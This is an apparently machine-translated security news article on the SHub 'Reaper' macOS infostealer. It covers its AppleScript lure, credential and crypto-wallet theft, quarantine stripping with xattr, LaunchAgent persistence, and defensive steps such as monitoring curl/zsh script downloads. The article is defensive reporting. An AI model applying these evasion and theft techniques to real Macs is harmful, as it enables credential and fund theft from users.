Reaping the new SHub variant that deceives macOS with applescript and steals credentials

A new variant of the infostealer known as SHub, baptized as Reaper, shows that attackers continue to adapt their techniques to overcome the safety improvements of macOS: instead of deceiving victims to stick commands in Terminal, they now use the URL scheme applescript: / / to open the Editor Script with an already loaded malicious AppleScript that shows a false security update and, if the user presses "Run," download and run code that installs a backdoor and steals sensitive data.

The sophistication of the attack is not only in social engineering - the decoy are false installers of popular applications such as WeChat or Miro hosted in domains that mimic the legitimate - but in the technical chain: the script dynamically builds the command that the payload brings, hides parts under ASCII art, escapes from analysis by fingerprinting virtual machines and VPNs, and goes to list browser extensions to detect password managers and cryptowallet extensions before deciding whether to proceed with the infection.

What he steals and how: Reaper requests the macOS password to access the keychain (Keychain) and decipher credentials, then search for browser data (Chrome, Firefox, Edge and others), wallets extensions such as MetaMask and Phantom, desktop purse applications (Exodus, Electrum, Ledger Live, etc.), Telegram sessions, iCloud data and desktop files and documents that may contain financial information. It also includes a "Filegrabber" that collects selected files with size and volume limits, and a routine that if you detect wallet customers ends legitimate processes and replaces central files (e.g., app.asar in electron-based applications) with malicious binaries downloaded from C2.

To evade protections like Gatekeeper and macOS warnings, malware clean quarantine attributes with xattr -cr and applies ad hoc to the modified bundle; its persistence ensures it by installing a LaunchAgent that runs regularly (every minute) by posing as a legitimate update and serving as a beacon to receive and execute additional payloads.

The implications are clear: individual users, professionals who handle private keys or credentials and companies with Mac in your park are objective. The combination of credentials theft, file exfiltration and ability to install remote access tools makes Reaper a platform that can evolve into more impact attacks, including the removal of wallets funds or lateral movement in corporate environments.

For the technical analysis and indicators published by the researchers, read the SentinelOne report on SHub Reaper: SentinelOne: SHub Reaper. For generic recommendations on malware hygiene and initial response practices, the CERT / CISA guide provides good guidelines: CISA: Protect your computer against malicious code.

Immediate recommended actions for users: do not run or "Run" on Editor Script windows that appear after downloading something from the web, always check the download domains directly from the supplier's official website, and prefer signed and verifiable packages. If you suspect your Mac has been compromised, disconnect it from the network, make safe backup and consider revoking and rotating credentials and keys. For cryptomoneda users, move funds to cold wallets (hardware wallets) and avoid operating from equipment that may be compromised.

Recommended actions for security administrators and equipment: monitor the execution of osascript and Script Editor from browsers or downloads, review recent LaunchAgens and entries that mimic legitimate updaters, detect files with deleted quarantine attributes ( xattr) or unusual ad hoc signatures, and search for app.asar file replacements in wallet applications. Integrate detection rules for atypical outgoing traffic to the Telegram API or C2-associated domains and deploy EDR tools that track zsh / curl process creation that download and run scripts from remote locations.

Finally, keep the system up-to-date, apply restriction policies on browsers and extensions (block unapproved extensions), promote the principle of less privilege (do not use administrator accounts for daily tasks) and educate users on social engineering techniques as false updates and "ClickFix" -style promptts. The threat is double: technical and human; reducing the attack surface requires technical controls and changes in user behavior.